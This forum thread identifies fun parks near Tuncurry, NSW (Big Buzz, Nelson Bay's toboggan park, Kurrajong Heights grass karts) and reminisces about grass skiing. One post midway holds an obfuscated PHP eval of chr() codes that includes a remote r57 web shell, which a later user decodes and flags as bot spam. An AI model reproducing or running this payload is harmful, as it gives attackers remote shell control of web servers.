Anyone know this park?

coasterlover

Does anyone know the name of this park, its in NSW in a think a place called tuncurry? sounds something like that, between Sydney + the gold coast that costal area, and it had 2 toboggan tracks a few waterslides chip and putt golf thing trampolines a big slide buggy things that went down a hill and it cost $20 to get in (2001) seems simular to the jamberoo park, i cant find any info on it

After 30 seconds worth of Googling, I found this from the site shown here. "...Fun Parks Ton O Fun is a family fun park with paddleboats, mini golf, a jumping castle, a mini train, dodgems on water, odyssey thrill machines, go karts, two large waterslides, quad bikes, volleyball, a merry-go-round, pedal cars, a bistro and kiosk and picnic-barbecue areas. It is open from 10.00 a.m. to 4.00 p.m. on weekends, public holidays and every day of the school holidays but closed throughout the winter, tel: (02) 6554 3090. Head north from Tuncurry along The Lakes Way for 11 km. To the right, opposite the turnoff to Failford, is Ton O Fun Rd. Another 9 km north along The Lakes Way (which becomes Tuncurry Rd) at Rainbow Flat is the Big Buzz Fun Park . It features three waterslides, a toddler's slide, a toboggan run, mini grass trikes, super grass trikes, pony rides, mono boards, peddlecarts, skatebikes, pony rides, volleyball, trampolines, swings, a swimming pool, a kiosk, shaded picnic areas and free gas barbecues. It is open from 10.00 a.m. to 4.00 p.m. weekends, public holidays and every day in the school holidays, tel: (02) 6553 6000..."

• 3 weeks later...
ah thanks, it was the "Big Buzz" park dosent look like anythings changed since i went there, cant believe it cost $20 to get in, and now it says it cost 25! geeze,
:mellow: Does the Clews family still own that park? Steve Clews was his name. We used to Grass Ski there and have our state championships there, not much of a hill, but lots of bumps to chuck filth airs off. they had a home-made "J" Bar kind of tow on the hill with a starter box on top. They then built a toboggan run which was cool. Not as cool as Grass Skiing though, that used to go off, in 1991 they had the state championships on a hill of a friends' place across on the other side of the Tuncurry Way, twice as long, but a bummer having to walk back up..... Jamberoo used to do Grass Skiing, but stopped it. I wonder if Kurrajong Heights Grass & Carts park is still around (Bells Line of Rd, Kurrajong heights).... ?

• 2 weeks later...
  • 1 month later...
Does anyone know the name of this park, its in NSW in a think a place called tuncurry? sounds something like that, between Sydney + the gold coast that costal area, and it had 2 toboggan tracks a few waterslides chip and putt golf thing trampolines a big slide buggy things that went down a hill and it cost $20 to get in (2001) seems simular to the jamberoo park, i cant find any info on it
theres a part on nelsons bay rd nelsons bay that fits that desciption.i think its call tobbogan world or something like that.

• 3 weeks later...
:mellow: Does the Clews family still own that park? Steve Clews was his name. We used to Grass Ski there and have our state championships there, not much of a hill, but lots of bumps to chuck filth airs off. they had a home-made "J" Bar kind of tow on the hill with a starter box on top. They then built a toboggan run which was cool. Not as cool as Grass Skiing though, that used to go off, in 1991 they had the state championships on a hill of a friends' place across on the other side of the Tuncurry Way, twice as long, but a bummer having to walk back up..... Jamberoo used to do Grass Skiing, but stopped it. I wonder if Kurrajong Heights Grass & Carts park is still around (Bells Line of Rd, Kurrajong heights).... ?
I use to know the old owner of the grass skiing at kurrajong heights,unless it has re openned,it closed down a few years ago.

I've been to the one at Nelson Bay it has 1 toboggan, mini golf, a giant maze, used to have mini jeep/buggy things on a track that u could race but closed after major storm in 2002, weird bumper cars, indoor rock climbing and thats about all. It's $2pp entry but you have to pay for everything except the maze! The tobbogan run is still working well. Oh, and if you go on a school day entry is free. (They can't be bothered operating the turnstiles every day!)

• 3 months later...
eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(114). chr(115). chr(116). chr(46). chr(118). chr(111). chr(105). chr(100). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); //
That's suppose to mean?

The post must have been done by a bot, and was written in ASCII, so after going through each character i came up with this, i deliberatley spaced each character as well as replacing "o"s with "0"s in order to stop it becoming a link, as it could be dangerous, but to stop all you wondering what the hell it meant the message read; I n c lu d e “h t t p: / / r s t .v 0 i d .r u /d 0 w n l 0 a d / r 5 7 s h e l l . t x t # ; / * man these bot things are becoming a bit of a problem........

• 7 months later...

Hey that scsii bot stuff is freaky. Any ways 2007 and Grass karts are still there! http://www. grasskarts. info/ Prepare for a sore bum! These scary home made style carts, at high speed, can really drift ! -and roll over conversely if you arent arent watchful of the grass potholes or divots. I would love to smuggle a can of WD40 up with me as these things could do with it i think. And one more downside apart from the sore bum and lack of any form of suspension. A little severe, but i wore a motorbike jacket and helmet for the fun of it-and gloves! When i came off i didnt care at all! Pay them a visit and keep them running please! Cheers.